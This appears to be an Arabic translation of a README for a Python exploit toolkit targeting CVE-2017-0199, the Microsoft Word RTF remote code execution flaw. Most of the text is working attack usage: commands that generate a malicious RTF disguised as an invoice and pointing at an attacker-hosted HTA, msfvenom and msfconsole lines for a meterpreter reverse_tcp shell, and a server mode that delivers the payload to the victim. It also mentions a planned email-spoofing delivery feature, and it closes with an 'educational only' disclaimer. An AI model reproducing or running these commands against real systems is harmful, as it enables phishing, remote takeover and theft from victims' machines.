
أداة Exploit toolkit CVE-2017-0199 - v2.0 هي سكربت بايثون مفيد يوفر طريقة سريعة وفعالة لاستغلال ثغرة Microsoft RTF RCE. يمكنها توليد ملف RTF خبيث وتسليم حمولة metasploit / meterpreter / أو أي حمولة أخرى إلى الضحية دون أي إعداد معقد.
مجموعة أدوات الاستغلال CVE-2017-0199 - الإصدار 2.0 هي سكربت بايثون عملي يوفر طريقة سريعة وفعالة لاستغلال ثغرة تنفيذ الأوامر البرمجية عن بُعد (RCE) في Microsoft RTF. يمكنها توليد ملف RTF خبيث وتسليم حمولة metasploit / meterpreter إلى الضحية دون أي إعدادات معقدة.
أضاف هذا الإصدار الإمكانيات التالية إلى السكربت
- توليد ملف RTF خبيث باستخدام المجموعة
- تشغيل المجموعة في وضع الاستغلال كخادم HTA مصغر + خادم ويب
الإصدار: بايثون 2.7.13
جارٍ العمل على الميزة التالية
- إرسال ملف RTF الخبيث المُولَّد تلقائيًا إلى الضحية باستخدام انتحال البريد الإلكتروني
الخطوة 1: توليد ملف RTF خبيث باستخدام الأمر التالي وإرساله إلى الضحية
Syntax:
# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Example:
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
الخطوة 2 (اختيارية، إذا كنت تستخدم حمولة MSF): توليد حمولة metasploit وبدء المُعالج (handler)
Example:
Generate Payload:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Start Handler:
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
الخطوة 3: تشغيل المجموعة في وضع الاستغلال لتسليم الحمولات
Syntax:
# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Example:
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-0199_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
Modes:
-M gen Generate Malicious RTF file only
Generate malicious RTF file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation:
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).
هذا البرنامج مخصص للأغراض التعليمية فقط. لا تستخدمه دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة حقيقة أنني (bhdresh) لست مسؤولاً عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو سوء الاستخدام لهذه البرامج أو أي مشتقات منها. باستخدامك لهذا البرنامج فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية bhdresh.
@nixawk لتوفير عينة RTF، @bhdresh
من الواضح أنني لست مطورًا بدوام كامل، لذا توقع بعض الأخطاء
يرجى الإبلاغ عن الأخطاء والمشكلات إلى [email protected]